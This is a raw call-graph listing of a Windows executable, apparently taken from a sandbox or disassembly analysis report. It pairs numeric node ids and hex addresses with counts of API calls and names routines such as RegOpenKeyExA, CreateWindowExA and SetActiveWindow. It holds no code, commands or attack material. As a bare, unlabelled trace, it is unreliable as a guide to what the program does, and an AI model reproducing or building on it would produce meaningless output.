50438->50651 50764 46b1dc 33 API calls 50438->50764 50439->50438 50441 46be3d 50442 403450 18 API calls 50441->50442 50443 46be4d 50442->50443 50444 46bea9 50443->50444 50445 46be59 50443->50445 50450 46bf6b 50444->50450 50574 46af68 50444->50574 50748 457f1c 50445->50748 50449 457f1c 38 API calls 50449->50456 50456->50437 50765 46c424 50460->50765 50463 46b852 50465 403420 4 API calls 50463->50465 50467 46b86c 50465->50467 50466 46b71e 50468 46b83e 50466->50468 50772 455f84 27 API calls 50466->50772 50469 403400 4 API calls 50467->50469 50468->50463 50471 403450 18 API calls 50468->50471 50472 46b874 50469->50472 50471->50463 50473 403400 4 API calls 50472->50473 50474 46b87c 50473->50474 50474->50422 50475 46b801 50475->50463 50475->50468 50480 42cd48 21 API calls 50475->50480 50477 46b7a1 50477->50463 50477->50475 50782 42cd48 50477->50782 50479 46b73c 50479->50477 50773 466600 50479->50773 50482 46b817 50480->50482 50482->50468 50487 451458 18 API calls 50482->50487 50486 466600 33 API calls 50489 46b77c 50486->50489 50490 46b82e 50487->50490 50789 47efd0 56 API calls 50490->50789 50496 468bb0 33 API calls 50495->50496 50497 468c83 50496->50497 50497->50423 50499 468bdf 50498->50499 50500 4078f4 33 API calls 50499->50500 50503 468c20 50499->50503 50501 468c18 50500->50501 51042 453344 18 API calls 50501->51042 50504 403400 4 API calls 50503->50504 50505 468c38 50504->50505 50505->50438 50507 46ace5 50506->50507 50509 46ace0 50506->50509 51128 469a80 60 API calls 50507->51128 50508 46ace3 50508->50438 50509->50508 51043 46a740 50509->51043 50511 46aced 50511->50438 50514 403400 4 API calls 50513->50514 50515 469f4a 50514->50515 51505 47dd00 50515->51505 50517 469fad 50518 469fb1 50517->50518 50519 469fca 50517->50519 51512 466800 50518->51512 50521 469fbb 50519->50521 51515 494c90 18 API calls 50519->51515 50523 46a25e 50521->50523 50526 46a154 50521->50526 50527 46a0e9 50521->50527 50524 403420 4 API calls 50523->50524 50529 46a288 50524->50529 50525 469fe6 50525->50521 50530 469fee 50525->50530 50528 403494 4 API calls 50526->50528 50531 403494 4 API calls 50527->50531 50533 46a161 50528->50533 50529->50441 50534 46af68 37 API calls 50530->50534 50532 46a0f6 50531->50532 50535 40357c 18 API calls 50532->50535 50536 40357c 18 API calls 50533->50536 50543 469ffb 50534->50543 50537 46a103 50535->50537 50538 46a16e 50536->50538 50539 40357c 18 API calls 50537->50539 50540 40357c 18 API calls 50538->50540 50541 46a110 50539->50541 50542 46a17b 50540->50542 50544 40357c 18 API calls 50541->50544 50545 40357c 18 API calls 50542->50545 50548 46a024 SetActiveWindow 50543->50548 50549 46a03c 50543->50549 50546 46a11d 50544->50546 50547 46a188 50545->50547 50550 466800 34 API calls 50546->50550 50551 40357c 18 API calls 50547->50551 50548->50549 51516 42f560 50549->51516 50552 46a12b 50550->50552 50553 46a196 50551->50553 50555 40357c 18 API calls 50552->50555 50556 414b18 18 API calls 50553->50556 50558 46a134 50555->50558 50559 46a152 50556->50559 50561 40357c 18 API calls 50558->50561 51533 466b38 50559->51533 50564 46a141 50561->50564 50563 46a08d 50566 46ade4 35 API calls 50563->50566 50565 414b18 18 API calls 50564->50565 50565->50559 50567 46a0bf 50566->50567 50567->50441 50575 468c74 33 API calls 50574->50575 50576 46af80 50575->50576 50577 46afa2 50576->50577 50578 4652cc 21 API calls 50576->50578 51729 4652cc 50577->51729 50578->50577 50582 46afba 50583 46ade4 35 API calls 50582->50583 50584 46aff2 50583->50584 50585 414b18 18 API calls 50584->50585 50586 46b006 50585->50586 50587 46b012 50586->50587 50588 46b03c 50586->50588 50589 414b18 18 API calls 50587->50589 50591 46b05b 50588->50591 50592 46b085 50588->50592 50590 46b026 50589->50590 50593 414b18 18 API calls 50590->50593 50594 414b18 18 API calls 50591->50594 50595 414b18 18 API calls 50592->50595 50597 46b03a 50593->50597 50598 46b06f 50594->50598 50596 46b099 50595->50596 50599 414b18 18 API calls 50596->50599 51746 46acfc 50597->51746 50600 414b18 18 API calls 50598->50600 50599->50597 50600->50597 50652 46c424 62 API calls 50651->50652 50653 4830c7 50652->50653 50654 4830d0 50653->50654 52016 408be0 19 API calls 50653->52016 50656 414ae8 18 API calls 50654->50656 50657 4830e0 50656->50657 50658 403450 18 API calls 50657->50658 50659 4830ed 50658->50659 51818 46c77c 50659->51818 50662 4830fd 50664 414ae8 18 API calls 50662->50664 50665 48310d 50664->50665 50666 403450 18 API calls 50665->50666 50667 48311a 50666->50667 50668 469868 SendMessageA 50667->50668 50669 483133 50668->50669 50670 483184 50669->50670 52018 479e18 37 API calls 50669->52018 51847 4241dc IsIconic 50670->51847 50674 48319f SetActiveWindow 50675 4831b4 50674->50675 51855 4824b4 50675->51855 50724->50420 50725->50422 50726->50422 50727->50422 53671 43d9c8 50728->53671 50731 494dcc 53676 431bd0 50731->53676 50732 494e52 50733 494e61 50732->50733 53709 4945c8 18 API calls 50732->53709 50733->50438 50742 494e16 53707 49465c 18 API calls 50742->53707 50744 494e2a 53708 433dd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50744->53708 50746 494e4a 50746->50438 50747->50430 50749 457f41 50748->50749 50750 457f61 50749->50750 50751 4078f4 33 API calls 50749->50751 50752 403400 4 API calls 50750->50752 50753 457f59 50751->50753 50754 457f76 50752->50754 50755 457d10 38 API calls 50753->50755 50754->50449 50755->50750 50764->50438 50790 46c4bc 50765->50790 50768 414ae8 50769 414af6 50768->50769 50770 4034e0 18 API calls 50769->50770 50771 414b03 50770->50771 50771->50466 50772->50479 50774 46661a 50773->50774 50993 4078f4 50774->50993 51036 42cccc 50782->51036 50785 451458 50786 451428 18 API calls 50785->50786 50787 451474 50786->50787 50788 47efd0 56 API calls 50787->50788 50788->50475 50789->50468 50791 414ae8 18 API calls 50790->50791 50792 46c4f0 50791->50792 50851 466898 50792->50851 50796 46c502 50797 46c511 50796->50797 50800 46c52a 50796->50800 50920 47efd0 56 API calls 50797->50920 50799 403420 4 API calls 50802 46b702 50799->50802 50801 46c571 50800->50801 50803 46c558 50800->50803 50804 46c5d6 50801->50804 50809 46c575 50801->50809 50802->50463 50802->50768 50921 47efd0 56 API calls 50803->50921 50923 42cb4c CharNextA 50804->50923 50807 46c5e5 50808 46c5e9 50807->50808 50813 46c602 50807->50813 50924 47efd0 56 API calls 50808->50924 50811 46c5bd 50809->50811 50809->50813 50922 47efd0 56 API calls 50811->50922 50812 46c626 50925 47efd0 56 API calls 50812->50925 50813->50812 50865 466a08 50813->50865 50818 46c525 50818->50799 50821 46c63f 50873 403778 50821->50873 50826 46c666 50926 466a94 18 API calls 50826->50926 50827 46c697 50884 42c8cc 50827->50884 50830 46c679 50832 451458 18 API calls 50830->50832 50834 46c686 50832->50834 50927 47efd0 56 API calls 50834->50927 50855 4668b2 50851->50855 50852 406bb0 18 API calls 50852->50855 50854 42cbc0 20 API calls 50854->50855 50855->50852 50855->50854 50856 403450 18 API calls 50855->50856 50857 4668fb 50855->50857 50930 42caac 50855->50930 50856->50855 50858 403420 4 API calls 50857->50858 50859 466915 50858->50859 50860 414b18 50859->50860 50861 414ae8 18 API calls 50860->50861 50862 414b3c 50861->50862 50863 403400 4 API calls 50862->50863 50864 414b6d 50863->50864 50864->50796 50866 466a12 50865->50866 50867 466a25 50866->50867 50946 42cb3c CharNextA 50866->50946 50867->50812 50869 466a38 50867->50869 50870 466a42 50869->50870 50871 466a6f 50870->50871 50947 42cb3c CharNextA 50870->50947 50871->50812 50871->50821 50874 4037aa 50873->50874 50875 40377d 50873->50875 50876 403400 4 API calls 50874->50876 50875->50874 50877 403791 50875->50877 50879 4037a0 50876->50879 50878 4034e0 18 API calls 50877->50878 50878->50879 50880 42c99c 50879->50880 50881 42c9f5 50880->50881 50882 42c9b2 50880->50882 50881->50826 50881->50827 50882->50881 50948 42cb3c CharNextA 50882->50948 50949 42c674 50884->50949 50920->50818 50921->50818 50922->50818 50923->50807 50924->50818 50925->50818 50926->50830 50927->50818 50931 403494 4 API calls 50930->50931 50932 42cabc 50931->50932 50933 403744 18 API calls 50932->50933 50935 42caf2 50932->50935 50939 42c444 IsDBCSLeadByte 50932->50939 50933->50932 50936 42cb36 50935->50936 50940 4037b8 50935->50940 50945 42c444 IsDBCSLeadByte 50935->50945 50936->50855 50939->50932 50941 403744 18 API calls 50940->50941 50943 4037c6 50941->50943 50942 4037fc 50942->50935 50943->50942 50944 4038a4 18 API calls 50943->50944 50944->50942 50945->50935 50946->50866 50947->50870 50948->50882 50952 42c67c 50949->50952 50951 42c67b 50955 42c68d 50952->50955 50953 42c6f1 50956 42c6ec 50953->50956 50960 42c444 IsDBCSLeadByte 50953->50960 50955->50953 50958 42c6ab 50955->50958 50956->50951 50958->50956 50959 42c444 IsDBCSLeadByte 50958->50959 50959->50958 50960->50956 50996 407908 50993->50996 50997 407925 50996->50997 51004 4075b8 50997->51004 51000 407951 51002 4034e0 18 API calls 51000->51002 51003 407903 51002->51003 51003->50486 51007 4075d3 51004->51007 51005 4075e5 51005->51000 51009 4069a0 19 API calls 51005->51009 51007->51005 51010 4076da 33 API calls 51007->51010 51011 4075ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51007->51011 51009->51000 51010->51007 51011->51007 51037 42cbc0 20 API calls 51036->51037 51038 42ccee 51037->51038 51039 42ccf6 GetFileAttributesA 51038->51039 51040 403400 4 API calls 51039->51040 51041 42cd13 51040->51041 51041->50475 51041->50785 51042->50503 51045 46a787 51043->51045 51044 46abff 51047 46ac1a 51044->51047 51048 46ac4b 51044->51048 51045->51044 51046 46a842 51045->51046 51049 403494 4 API calls 51045->51049 51052 46a863 51046->51052 51053 46a8a4 51046->51053 51050 403494 4 API calls 51047->51050 51051 403494 4 API calls 51048->51051 51055 46a7c6 51049->51055 51056 46ac28 51050->51056 51057 46ac59 51051->51057 51054 403494 4 API calls 51052->51054 51061 403400 4 API calls 51053->51061 51058 46a871 51054->51058 51059 414ae8 18 API calls 51055->51059 51155 46915c 26 API calls 51056->51155 51156 46915c 26 API calls 51057->51156 51063 414ae8 18 API calls 51058->51063 51064 46a7e7 51059->51064 51065 46a8a2 51061->51065 51067 46a892 51063->51067 51129 403634 51064->51129 51084 46a988 51065->51084 51135 469868 51065->51135 51066 46ac36 51069 403400 4 API calls 51066->51069 51070 403634 18 API calls 51067->51070 51073 46ac7c 51069->51073 51070->51065 51078 403400 4 API calls 51073->51078 51074 46aa10 51076 403400 4 API calls 51074->51076 51092 46aa0e 51076->51092 51077 46a8c4 51081 46a902 51077->51081 51082 46a8ca 51077->51082 51079 46ac84 51078->51079 51083 403420 4 API calls 51079->51083 51085 403400 4 API calls 51081->51085 51086 403494 4 API calls 51082->51086 51088 46ac91 51083->51088 51084->51074 51089 46a9cf 51084->51089 51090 46a900 51085->51090 51087 46a8d8 51086->51087 51141 47c26c 51087->51141 51088->50508 51095 403494 4 API calls 51089->51095 51144 469b5c 51090->51144 51150 469ca4 57 API calls 51092->51150 51099 46a9dd 51095->51099 51097 46aa39 51105 46aa44 51097->51105 51106 46aa9a 51097->51106 51098 46a8f0 51101 403634 18 API calls 51098->51101 51102 414ae8 18 API calls 51099->51102 51101->51090 51104 46a9fe 51102->51104 51107 403634 18 API calls 51104->51107 51109 403494 4 API calls 51105->51109 51108 403400 4 API calls 51106->51108 51107->51092 51115 46aaa2 51108->51115 51117 46aa52 51109->51117 51110 46a929 51111 46a934 51110->51111 51112 46a98a 51110->51112 51114 403494 4 API calls 51111->51114 51113 403400 4 API calls 51112->51113 51113->51084 51119 46a942 51114->51119 51127 46ab4b 51115->51127 51151 494c90 18 API calls 51115->51151 51117->51115 51121 403634 18 API calls 51117->51121 51123 46aa98 51117->51123 51118 46aac5 51118->51127 51152 494f3c 32 API calls 51118->51152 51119->51084 51122 403634 18 API calls 51119->51122 51121->51117 51122->51119 51123->51115 51125 46abec 51154 429144 SendMessageA SendMessageA 51125->51154 51153 4290f4 SendMessageA 51127->51153 51128->50511 51130 40363c 51129->51130 51131 4034bc 18 API calls 51130->51131 51132 40364f 51131->51132 51133 403450 18 API calls 51132->51133 51134 403677 51133->51134 51157 42a040 SendMessageA 51135->51157 51137 469897 51137->51077 51138 469877 51138->51137 51158 42a040 SendMessageA 51138->51158 51140 469887 51140->51077 51159 47c2b4 51141->51159 51148 469b89 51144->51148 51145 469beb 51146 403400 4 API calls 51145->51146 51147 469c00 51146->51147 51147->51110 51148->51145 51504 469ae0 57 API calls 51148->51504 51150->51097 51151->51118 51152->51127 51153->51125 51154->51044 51155->51066 51156->51066 51157->51138 51158->51140 51160 403494 4 API calls 51159->51160 51167 47c2e7 51160->51167 51161 47c3f9 51162 403420 4 API calls 51161->51162 51163 47c289 51162->51163 51163->51098 51165 403778 18 API calls 51165->51167 51167->51161 51167->51165 51170 4037b8 18 API calls 51167->51170 51171 47b100 51167->51171 51415 453344 18 API calls 51167->51415 51416 403800 51167->51416 51420 42c97c CharPrevA 51167->51420 51170->51167 51172 47b152 51171->51172 51173 47b130 51171->51173 51174 47b172 51172->51174 51175 47b160 51172->51175 51173->51172 51425 47a030 33 API calls 51173->51425 51178 47b1d5 51174->51178 51179 47b180 51174->51179 51176 403494 4 API calls 51175->51176 51230 47b16d 51176->51230 51188 47b1f6 51178->51188 51189 47b1e3 51178->51189 51181 47b1af 51179->51181 51182 47b189 51179->51182 51180 403400 4 API calls 51183 47baf8 51180->51183 51185 47b1c2 51181->51185 51427 453344 18 API calls 51181->51427 51184 47b19c 51182->51184 51426 453344 18 API calls 51182->51426 51187 403400 4 API calls 51183->51187 51191 403494 4 API calls 51184->51191 51186 403494 4 API calls 51185->51186 51186->51230 51193 47bb00 51187->51193 51195 47b217 51188->51195 51196 47b204 51188->51196 51194 403494 4 API calls 51189->51194 51191->51230 51193->51167 51194->51230 51198 47b267 51195->51198 51199 47b225 51195->51199 51197 403494 4 API calls 51196->51197 51197->51230 51206 47b275 51198->51206 51207 47b288 51198->51207 51200 47b241 51199->51200 51201 47b22e 51199->51201 51203 47b254 51200->51203 51428 453344 18 API calls 51200->51428 51202 403494 4 API calls 51201->51202 51202->51230 51205 403494 4 API calls 51203->51205 51205->51230 51208 403494 4 API calls 51206->51208 51209 47b296 51207->51209 51210 47b2a9 51207->51210 51208->51230 51211 403494 4 API calls 51209->51211 51212 47b2b7 51210->51212 51213 47b2ca 51210->51213 51211->51230 51214 403494 4 API calls 51212->51214 51215 47b2eb 51213->51215 51216 47b2d8 51213->51216 51214->51230 51218 47b327 51215->51218 51219 47b2f9 51215->51219 51217 403494 4 API calls 51216->51217 51217->51230 51224 47b335 51218->51224 51227 47b364 51218->51227 51220 47b315 51219->51220 51221 47b302 51219->51221 51223 47c26c 57 API calls 51220->51223 51222 403494 4 API calls 51221->51222 51222->51230 51223->51230 51225 47b351 51224->51225 51226 47b33e 51224->51226 51229 403494 4 API calls 51225->51229 51228 403494 4 API calls 51226->51228 51231 47b372 51227->51231 51232 47b3a0 51227->51232 51228->51230 51229->51230 51230->51180 51233 47b38e 51231->51233 51234 47b37b 51231->51234 51237 47b3ae 51232->51237 51238 47b3dd 51232->51238 51236 47c26c 57 API calls 51233->51236 51235 403494 4 API calls 51234->51235 51235->51230 51236->51230 51239 47b3b7 51237->51239 51240 47b3ca 51237->51240 51243 47b3fe 51238->51243 51244 47b3eb 51238->51244 51415->51167 51417 40382f 51416->51417 51418 403804 51416->51418 51417->51167 51419 4038a4 18 API calls 51418->51419 51419->51417 51420->51167 51425->51173 51426->51184 51427->51185 51428->51203 51504->51148 51506 47dd56 51505->51506 51507 47dd19 51505->51507 51506->50517 51537 455d0c 51507->51537 51511 47dd6d 51511->50517 51656 466714 51512->51656 51515->50525 51517 42f56c 51516->51517 51518 42f58f GetActiveWindow GetFocus 51517->51518 51519 41eea4 2 API calls 51518->51519 51520 42f5a6 51519->51520 51521 42f5c3 51520->51521 51522 42f5b3 RegisterClassA 51520->51522 51523 42f652 SetFocus 51521->51523 51524 42f5d1 CreateWindowExA 51521->51524 51522->51521 51525 403400 4 API calls 51523->51525 51524->51523 51526 42f604 51524->51526 51527 42f66e 51525->51527 51687 42427c 51526->51687 51532 494f3c 32 API calls 51527->51532 51529 42f62c 51530 42f634 CreateWindowExA 51529->51530 51530->51523 51531 42f64a ShowWindow 51530->51531 51531->51523 51532->50563 51693 44b514 51533->51693 51538 455d1d 51537->51538 51539 455d21 51538->51539 51540 455d2a 51538->51540 51563 455a10 51539->51563 51571 455af0 43 API calls 51540->51571 51543 455d27 51543->51506 51544 47d970 51543->51544 51549 47da6c 51544->51549 51551 47d9b0 51544->51551 51545 403420 4 API calls 51546 47db4f 51545->51546 51546->51511 51556 47dabd 51549->51556 51559 47da0f 51549->51559 51626 479630 51549->51626 51551->51549 51552 47da18 51551->51552 51555 47c26c 57 API calls 51551->51555 51551->51559 51600 479770 51551->51600 51611 4798d4 51551->51611 51552->51551 51557 47c26c 57 API calls 51552->51557 51562 47da59 51552->51562 51615 42c92c 51552->51615 51620 42c954 51552->51620 51625 47d67c 66 API calls 51552->51625 51553 47c26c 57 API calls 51553->51556 51554 454100 34 API calls 51554->51556 51555->51551 51556->51549 51556->51553 51556->51554 51556->51562 51557->51552 51559->51545 51562->51559 51572 42de1c 51563->51572 51565 455a2d 51566 455a7b 51565->51566 51575 455944 51565->51575 51566->51543 51569 455944 20 API calls 51570 455a5c RegCloseKey 51569->51570 51570->51543 51571->51543 51573 42de27 51572->51573 51574 42de2d RegOpenKeyExA 51572->51574 51573->51574 51574->51565 51580 42dd58 51575->51580 51577 403420 4 API calls 51578 4559f6 51577->51578 51578->51569 51579 45596c 51579->51577 51583 42dc00 51580->51583 51584 42dc26 RegQueryValueExA 51583->51584 51589 42dc49 51584->51589 51599 42dc6b 51584->51599 51585 403400 4 API calls 51587 42dd37 51585->51587 51586 42dc63 51588 403400 4 API calls 51586->51588 51587->51579 51588->51599 51589->51586 51590 4034e0 18 API calls 51589->51590 51591 403744 18 API calls 51589->51591 51589->51599 51590->51589 51592 42dca0 RegQueryValueExA 51591->51592 51592->51584 51593 42dcbc 51592->51593 51594 4038a4 18 API calls 51593->51594 51593->51599 51595 42dcfe 51594->51595 51596 42dd10 51595->51596 51598 403744 18 API calls 51595->51598 51597 403450 18 API calls 51596->51597 51597->51599 51598->51596 51599->51585 51601 479786 51600->51601 51602 479782 51600->51602 51603 403450 18 API calls 51601->51603 51602->51551 51604 479793 51603->51604 51605 4797b3 51604->51605 51606 479799 51604->51606 51608 479630 33 API calls 51605->51608 51607 479630 33 API calls 51606->51607 51609 4797af 51607->51609 51608->51609 51610 403400 4 API calls 51609->51610 51610->51602 51612 4798e0 51611->51612 51613 4798fb 51612->51613 51638 453344 18 API calls 51612->51638 51613->51551 51639 42c79c 51615->51639 51618 403778 18 API calls 51619 42c94e 51618->51619 51619->51552 51621 42c79c IsDBCSLeadByte 51620->51621 51622 42c964 51621->51622 51623 403778 18 API calls 51622->51623 51624 42c975 51623->51624 51624->51552 51625->51552 51627 47964b 51626->51627 51630 47967c 51627->51630 51637 47970a 51627->51637 51651 4794e4 33 API calls 51627->51651 51628 4796a1 51633 4796c2 51628->51633 51653 4794e4 33 API calls 51628->51653 51630->51628 51652 4794e4 33 API calls 51630->51652 51634 479702 51633->51634 51633->51637 51654 453344 18 API calls 51633->51654 51645 479368 51634->51645 51637->51549 51638->51613 51640 42c67c IsDBCSLeadByte 51639->51640 51642 42c7b1 51640->51642 51641 42c7fb 51641->51618 51642->51641 51644 42c444 IsDBCSLeadByte 51642->51644 51644->51642 51646 4793a3 51645->51646 51647 403450 18 API calls 51646->51647 51648 4793c8 51647->51648 51655 477a58 33 API calls 51648->51655 51650 479409 51650->51637 51651->51630 51652->51628 51653->51633 51654->51634 51655->51650 51657 403494 4 API calls 51656->51657 51658 466742 51657->51658 51673 42dbc8 51658->51673 51661 42dbc8 19 API calls 51662 466766 51661->51662 51663 466600 33 API calls 51662->51663 51664 466770 51663->51664 51665 42dbc8 19 API calls 51664->51665 51666 46677f 51665->51666 51676 466678 51666->51676 51669 42dbc8 19 API calls 51670 466798 51669->51670 51671 403400 4 API calls 51670->51671 51672 4667ad 51671->51672 51672->50521 51680 42db10 51673->51680 51677 466698 51676->51677 51678 4078f4 33 API calls 51677->51678 51679 4666e2 51678->51679 51679->51669 51681 42dbbb 51680->51681 51682 42db30 51680->51682 51681->51661 51682->51681 51683 4037b8 18 API calls 51682->51683 51685 403800 18 API calls 51682->51685 51686 42c444 IsDBCSLeadByte 51682->51686 51683->51682 51685->51682 51686->51682 51688 4242ae 51687->51688 51689 42428e GetWindowTextA 51687->51689 51691 403494 4 API calls 51688->51691 51690 4034e0 18 API calls 51689->51690 51692 4242ac 51690->51692 51691->51692 51692->51529 51696 44b38c 51693->51696 51697 44b3bf 51696->51697 51698 414ae8 18 API calls 51697->51698 51699 44b3d2 51698->51699 51700 44b3ff GetDC 51699->51700 51701 40357c 18 API calls 51699->51701 51707 41a1e8 51700->51707 51701->51700 51704 44b430 51715 44b0c0 51704->51715 51708 41a213 51707->51708 51709 41a2af 51707->51709 51726 403520 51708->51726 51710 403400 4 API calls 51709->51710 51711 41a2c7 SelectObject 51710->51711 51711->51704 51713 41a26b 51714 41a2a3 CreateFontIndirectA 51713->51714 51714->51709 51716 44b0d7 51715->51716 51727 4034e0 18 API calls 51726->51727 51728 40352a 51727->51728 51728->51713 51732 4652d7 51729->51732 51730 4653b2 51740 46708c 51730->51740 51731 46536a 51731->51730 51758 4185b8 21 API calls 51731->51758 51732->51730 51735 465327 51732->51735 51752 421a1c 51732->51752 51735->51731 51736 465361 51735->51736 51737 46536c 51735->51737 51738 421a1c 21 API calls 51736->51738 51739 421a1c 21 API calls 51737->51739 51738->51731 51739->51731 51741 4670bc 51740->51741 51742 46709d 51740->51742 51741->50582 51743 414b18 18 API calls 51742->51743 51744 4670ab 51743->51744 51745 414b18 18 API calls 51744->51745 51745->51741 51753 421a74 51752->51753 51754 421a2a 51752->51754 51753->51735 51757 421a59 51754->51757 51759 408cbc 51754->51759 51757->51753 51767 421d28 SetFocus GetFocus 51757->51767 51758->51730 51760 408cc8 51759->51760 51768 406dec LoadStringA 51760->51768 51763 403450 18 API calls 51764 408cf9 51763->51764 51765 403400 4 API calls 51764->51765 51766 408d0e 51765->51766 51766->51757 51767->51753 51769 4034e0 18 API calls 51768->51769 51770 406e19 51769->51770 51770->51763 51819 46c7a5 51818->51819 51820 414ae8 18 API calls 51819->51820 51835 46c7f2 51819->51835 51821 46c7bb 51820->51821 52025 466924 20 API calls 51821->52025 51822 403420 4 API calls 51824 46c89c 51822->51824 51824->50662 52017 408be0 19 API calls 51824->52017 51825 46c7c3 51826 414b18 18 API calls 51825->51826 51827 46c7d1 51826->51827 51828 46c7de 51827->51828 51830 46c7f7 51827->51830 52026 47efd0 56 API calls 51828->52026 51831 46c80f 51830->51831 51833 466a08 CharNextA 51830->51833 52027 47efd0 56 API calls 51831->52027 51834 46c80b 51833->51834 51834->51831 51836 46c825 51834->51836 51835->51822 51837 46c841 51836->51837 51838 46c82b 51836->51838 51840 42c99c CharNextA 51837->51840 52028 47efd0 56 API calls 51838->52028 51841 46c84e 51840->51841 51841->51835 52029 466a94 18 API calls 51841->52029 51843 46c865 51844 451458 18 API calls 51843->51844 51845 46c872 51844->51845 52030 47efd0 56 API calls 51845->52030 51848 4241ed SetActiveWindow 51847->51848 51852 424223 51847->51852 52031 42364c 51848->52031 51852->50674 51852->50675 51853 42420a 51853->51852 51854 42421d SetFocus 51853->51854 51854->51852 51856 482505 51855->51856 51857 4824d7 51855->51857 51859 475bd0 51856->51859 52044 494cec 32 API calls 51857->52044 52045 457d10 51859->52045 51863 475c26 52018->50670 52025->51825 52026->51835 52027->51835 52028->51835 52029->51843 52030->51835 52040 4235f8 SystemParametersInfoA 52031->52040 52034 423665 ShowWindow 52036 423670 52034->52036 52037 423677 52034->52037 52043 423628 SystemParametersInfoA 52036->52043 52039 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 52037->52039 52039->51853 52041 423616 52040->52041 52041->52034 52042 423628 SystemParametersInfoA 52041->52042 52042->52034 52043->52037 52044->51856 52046 457e44 52045->52046 52047 457d3c 52045->52047 52048 457e95 52046->52048 52521 45757c 20 API calls 52046->52521 52517 457a0c GetSystemTimeAsFileTime FileTimeToSystemTime 52047->52517 52051 403400 4 API calls 52048->52051 52053 457eaa 52051->52053 52052 457d44 52054 4078f4 33 API calls 52052->52054 52066 4072a8 52053->52066 52055 457db5 52054->52055 52518 457d00 34 API calls 52055->52518 52057 403778 18 API calls 52061 457dbd 52057->52061 52058 457e0b 52061->52057 52061->52058 52062 457d00 34 API calls 52061->52062 52062->52061 52067 403738 52066->52067 52068 4072b2 SetCurrentDirectoryA 52067->52068 52068->51863 52517->52052 52518->52061 52521->52048 53710 431eec 53671->53710 53673 43d9f2 53674 403400 4 API calls 53673->53674 53675 43da76 53674->53675 53675->50731 53675->50732 53677 431bd6 53676->53677 53678 402648 18 API calls 53677->53678 53679 431c06 53678->53679 53680 4947f8 53679->53680 53681 4948cd 53680->53681 53682 494812 53680->53682 53687 494910 53681->53687 53682->53681 53684 433d6c 18 API calls 53682->53684 53686 403450 18 API calls 53682->53686 53715 408c0c 18 API calls 53682->53715 53716 431ca0 53682->53716 53684->53682 53686->53682 53688 49492c 53687->53688 53724 433d6c 53688->53724 53690 494931 53691 431ca0 18 API calls 53690->53691 53692 49493c 53691->53692 53693 43d594 53692->53693 53694 43d5c1 53693->53694 53695 43d5b3 53693->53695 53694->50742 53695->53694 53696 43d63d 53695->53696 53700 447084 18 API calls 53695->53700 53703 43d6f7 53696->53703 53727 447084 53696->53727 53698 43d688 53733 43dd50 53698->53733 53700->53695 53701 43d8fd 53701->53694 53753 447024 18 API calls 53701->53753 53703->53701 53704 43d8de 53703->53704 53751 447024 18 API calls 53703->53751 53752 447024 18 API calls 53704->53752 53707->50744 53708->50746 53709->50733 53711 403494 4 API calls 53710->53711 53713 431efb 53711->53713 53712 431f25 53712->53673 53713->53712 53714 403744 18 API calls 53713->53714 53714->53713 53715->53682 53717 431cc0 53716->53717 53718 431cae 53716->53718 53720 431ce2 53717->53720 53723 431c40 18 API calls 53717->53723 53722 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53718->53722 53720->53682 53722->53717 53723->53720 53725 402648 18 API calls 53724->53725 53726 433d7b 53725->53726 53726->53690 53728 4470a3 53727->53728 53729 4470aa 53727->53729 53754 446e30 18 API calls 53728->53754 53731 431ca0 18 API calls 53729->53731 53732 4470ba 53731->53732 53732->53698 53734 43dd6c 53733->53734 53740 43dd99 53733->53740 53735 402660 4 API calls 53734->53735 53734->53740 53735->53734 53736 43ddce 53736->53703 53738 43fea5 53738->53736 53764 447024 18 API calls 53738->53764 53739 43c938 18 API calls 53739->53740 53740->53736 53740->53738 53740->53739 53741 447024 18 API calls 53740->53741 53743 433b18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53740->53743 53746 446e30 18 API calls 53740->53746 53748 433d18 18 API calls 53740->53748 53749 436650 18 API calls 53740->53749 53750 431c40 18 API calls 53740->53750 53755 4396e0 53740->53755 53761 436e4c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53740->53761 53762 43dc48 32 API calls 53740->53762 53763 433d34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53740->53763 53741->53740 53743->53740 53746->53740 53748->53740 53749->53740 53750->53740 53751->53703 53752->53701 53753->53701 53754->53729 53756 4396e9 53755->53756 53757 403400 4 API calls 53756->53757 53761->53740 53762->53740 53763->53740 53764->53738 53767 41fb58 53768 41fb61 53767->53768 53771 41fdfc 53768->53771 53770 41fb6e 53772 41feee 53771->53772 53773 41fe13 53771->53773 53772->53770 53773->53772 53792 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53773->53792 53775 41fe49 53776 41fe73 53775->53776 53777 41fe4d 53775->53777 53802 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53776->53802 53793 41fb9c 53777->53793 53781 41fe81 53783 41fe85 53781->53783 53784 41feab 53781->53784 53782 41fb9c 10 API calls 53787 41fe71 53782->53787 53785 41fb9c 10 API calls 53783->53785 53786 41fb9c 10 API calls 53784->53786 53788 41fe97 53785->53788 53789 41febd 53786->53789 53787->53770 53791 41fb9c 10 API calls 53788->53791 53790 41fb9c 10 API calls 53789->53790 53790->53787 53791->53787 53792->53775 53794 41fbb7 53793->53794 53795 41fbcd 53794->53795 53796 41f93c 4 API calls 53794->53796 53803 41f93c 53795->53803 53796->53795 53798 41fc15 53799 41fc38 SetScrollInfo 53798->53799 53811 41fa9c 53799->53811 53802->53781 53804 4181e0 53803->53804 53805 41f959 GetWindowLongA 53804->53805 53806 41f996 53805->53806 53807 41f976 53805->53807 53823 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53806->53823 53822 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53807->53822 53810 41f982 53810->53798 53812 41faaa 53811->53812 53813 41fab2 53811->53813 53812->53782 53814 41faf1 53813->53814 53815 41fae1 53813->53815 53819 41faef 53813->53819 53825 417e48 IsWindowVisible ScrollWindow SetWindowPos 53814->53825 53824 417e48 IsWindowVisible ScrollWindow SetWindowPos 53815->53824 53816 41fb31 GetScrollPos 53816->53812 53820 41fb3c 53816->53820 53819->53816 53821 41fb4b SetScrollPos 53820->53821 53821->53812 53822->53810 53823->53810 53824->53819 53825->53819 53826 420598 53827 4205ab 53826->53827 53847 415b30 53827->53847 53829 4206f2 53830 420709 53829->53830 53854 4146d4 KiUserCallbackDispatcher 53829->53854 53834 420720 53830->53834 53855 414718 KiUserCallbackDispatcher 53830->53855 